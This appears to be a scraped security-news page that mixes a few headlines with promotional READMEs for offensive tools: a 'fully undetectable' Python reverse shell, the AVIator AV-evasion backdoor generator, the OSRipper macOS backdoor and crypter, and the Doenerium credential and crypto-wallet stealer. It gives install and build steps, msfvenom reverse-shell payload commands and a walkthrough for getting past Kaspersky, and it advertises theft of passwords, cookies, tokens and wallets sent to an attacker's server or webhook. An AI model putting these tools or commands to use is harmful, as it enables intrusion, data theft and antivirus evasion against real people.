LummaC2 Malware Deploys New Trigonometry-Based Anti-Sandbox Technique

Cybercriminals Using New ASMCrypt Malware Loader to Fly Under the Radar

pyFUD - Multi Clients FUD Reverse Shell

python3 based multi clients reverse shell.

Warning:

1. Don't Upload Any Payloads To VirusTotal.com Bcz This tool will not work
   with Time.
2. Virustotal Share Signatures With AV Comapnies.
3. Again Don't be an Idiot!

Installation:

1. git clone https://github.com/machine1337/pyFUD
2. python3 server.py (enter your ip,port and start the server)
3. client.py (Edit IP AND PORT To Put Your Own IP,Port)

Usage:

1. python3 server.py
2. Now Compile client.py to exe (make sure change ip and port in it)

Features:

1. Very Simple And Fully Undectable Reverse Shell
2. Multi Client Handling
3. Persistent  Shell
3. auto-reconnect
5. U can Convert client.py to exe using pyinstaller tool in windows.

Warning:

Use this tool Only for Educational Purpose And I will Not be Responsible For ur cruel act.

AVIator - Antivirus Evasion Project

AviAtor Ported to NETCore 5 with an updated UI

AV|Ator

About://name

AV: AntiVirus

Ator: Is a swordsman, alchemist, scientist, magician, scholar, and engineer, with the ability to sometimes produce objects out of thin air (https://en.wikipedia.org/wiki/Ator)

About://purpose

AV|Ator is a backdoor generator utility, which uses cryptographic and injection techniques in order to bypass AV detection. More specifically:

• It uses AES encryption in order to encrypt a given shellcode
• Generates an executable file which contains the encrypted payload
• The shellcode is decrypted and injected to the target system using various injection techniques

[https://attack.mitre.org/techniques/T1055/]:

1. Portable executable injection which involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue.

2. Thread execution hijacking which involves injecting malicious code or the path to a DLL into a thread of a process. Similar to Process Hollowing, the thread must first be suspended.

Usage

The application has a form which consists of three main inputs (See screenshot bellow):

1. A text containing the encryption key used to encrypt the shellcode
2. A text containing the IV used for AES encryption
3. A text containing the shellcode

Important note: The shellcode should be provided as a C# byte array.

The default values contain shellcode that executes notepad.exe (32bit). This demo is provided as an indication of how the code should be formed (using msfvenom, this can be easily done with the -f csharp switch, e.g. msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f csharp).

After filling the provided inputs and selecting the output path an executable is generated according to the chosen options.

RTLO option

In simple words, spoof an executable file to look like having an "innocent" extention like 'pdf', 'txt' etc. E.g. the file "testcod.exe" will be interpreted as "tesexe.doc"

Beware of the fact that some AVs alert the spoof by its own as a malware.

Set custom icon

I guess you all know what it is :)

Bypassing Kaspersky AV on a Win 10 x64 host (TEST CASE)

Getting a shell in a windows 10 machine running fully updated kaspersky AV

Target Machine: Windows 10 x64

1. Create the payload using msfvenom

   msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp

2. Use AVIator with the following settings

   Target OS architecture: x64

   Injection Technique: Thread Hijacking (Shellcode Arch: x64, OS arch: x64)

   Target procedure: explorer (leave the default)

3. Set the listener on the attacker machine

4. Run the generated exe on the victim machine

Installation

Windows:

Either compile the project or download the allready compiled executable from the following folder:

https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries

Linux:

Install Mono according to your linux distribution, download and run the binaries

e.g. in kali:

   root@kali# apt install mono-devel 

   root@kali# mono aviator.exe

Credits

To Damon Mohammadbagher for the encryption procedure

Disclaimer

I developed this app in order to overcome the demanding challenges of the pentest process and this is the ONLY WAY that this app should be used. Make sure that you have the required permission to use it against a system and never use it for illegal purposes.

OSRipper - AV Evading OSX Backdoor And Crypter Framework

OSripper is a fully undetectable Backdoor generator and Crypter which specialises in OSX M1 malware. It will also work on windows but for now there is no support for it and it IS NOT FUD for windows (yet at least) and for now i will not focus on windows.

You can also PM me on discord for support or to ask for new features SubGlitch1#2983

Features

• FUD (for macOS)
• Cloacks as an official app (Microsoft, ExpressVPN etc)
• Dumps; Sys info, Browser History, Logins, ssh/aws/azure/gcloud creds, clipboard content, local users etc. (more on Cedric Owens swiftbelt)
• Encrypted communications
• Rootkit-like Behaviour
• Every Backdoor generated is entirely unique

Description

Please check the wiki for information on how OSRipper functions (which changes extremely frequently)

https://github.com/SubGlitch1/OSRipper/wiki

Here are example backdoors which were generated with OSRipper

 macOS .apps will look like this on vt

Getting Started

Dependencies

You need python. If you do not wish to download python you can download a compiled release. The python dependencies are specified in the requirements.txt file.

Since Version 1.4 you will need metasploit installed and on path so that it can handle the meterpreter listeners.

Installing

Linux

apt install git python -y
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt

Windows

git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt

or download the latest release from https://github.com/SubGlitch1/OSRipper/releases/tag/v0.2.3

Executing program

Only this

sudo python3 main.py

Contributing

Please feel free to fork and open pull repuests. Suggestions/critisizm are appreciated as well

Roadmap

v0.1

• ✅Get down detection to 0/26 on antiscan.me
• ✅Add Changelog
• ✅Daemonise Backdoor
• ✅Add Crypter
• ✅Add More Backdoor templates
• ✅Get down detection to at least 0/68 on VT (for mac malware)

v0.2

• ✅Add AntiVM
• [] Implement tor hidden services
• ✅Add Logger
• ✅Add Password stealer
• [] Add KeyLogger
• ✅Add some new evasion options
• ✅Add SilentMiner
• [] Make proper C2 server

v0.3

Coming soon

Help

Just open a issue and ill make sure to get back to you

Changelog

• 0.2.1

  • OSRipper will now pull all information from the Target and send them to the c2 server over sockets. This includes information like browser history, passwords, system information, keys and etc.

• 0.1.6

  • Proccess will now trojanise itself as com.apple.system.monitor and drop to /Users/Shared

• 0.1.5

  • Added Crypter

• 0.1.4

  • Added 4th Module

• 0.1.3

  • Got detection on VT down to 0. Made the Proccess invisible

• 0.1.2

  • Added 3rd module and listener

• 0.1.1

  • Initial Release

License

MIT

Acknowledgments

Inspiration, code snippets, etc.

• htr
• swiftbelt

Support

I am very sorry to even write this here but my finances are not looking good right now. If you appreciate my work i would really be happy about any donation. You do NOT have to this is solely optional

BTC: 1LTq6rarb13Qr9j37176p3R9eGnp5WZJ9T

Disclaimer

I am not responsible for what is done with this project. This tool is solely written to be studied by other security researchers to see how easy it is to develop macOS malware.

Researchers Detail Evasive DarkTortilla Crypter Used to Deliver Malware

Doenerium - Fully Undetected Grabber (Grabs Wallets, Passwords, Cookies, Modifies Discord Client Etc.)

Fully Undetected Grabber (Grabs Wallets, Passwords, Cookies, Modifies Discord Client Etc.)

Features

Stealer

• Discord Token
• Discord Info - Username, Phone number, Email, Billing, Nitro Status & Backup Codes
• Discord Friends with rare badges
• Grabs crypto wallets
• Zcash
• Armory
• Bytecoin
• Jaxx
• Exodus
• Ethereum
• Electrum
• AtomicWallet
• Guarda
• Coinomi
• Browser (Chrome, Opera, Firefox, OperaGX, Edge, Brave, Yandex) - Passwords, Cookies, Autofill & History (Searches for specific keywords such as PayPal, Coinbase etc. in them)
• Screenshot(s)
• Injects itself to discord to grab token when changed

Additional

• Crypto Clipper - BTC, LTC, XMR, ETH, XRP, NEO, BCH, DOGE, DASH, XLM
• Ultra Obfuscation (use https://obfuscator.io)
• Anti-Debug
• Anti-VM
• Validates a found discord token and then sends it to your discord webhook
• Sends all files to your discord webhook in beautiful embeds and a structured zip filE

Screenshots

  Setting Up

Install Node.js

Install Visual studio with C++ compilers and all enabled (is a bit gigs but u wont have errors)

Run install.bat file to install all necessary files

Replace WEBHOOK with your webhook in config.js

Run build.bat and wait for doenerium-win.exe to be built.

Todo

• Exodus wallet injection (get the password whenever the user logs in the wallet)
• More grabbers (VPN's, Gaming, Messengers)
• Keylogger
• Growtopia stealer
• Discord bot to build within discord ($build <webhook_url>)
• Dynamic encryption

License

By downloading this, you agree to the Commons Clause license and that you're not allowed to sell this repository or any code from this repository. For more info see commonsclause

Note

There is no official telegram server of this project. I don't own t.me/doenerium

I am not responsible for any damages this software may cause. This was made for personal education.

Credits

Credits to Pandoric / PandoricGalaxy for creating this beautiful README file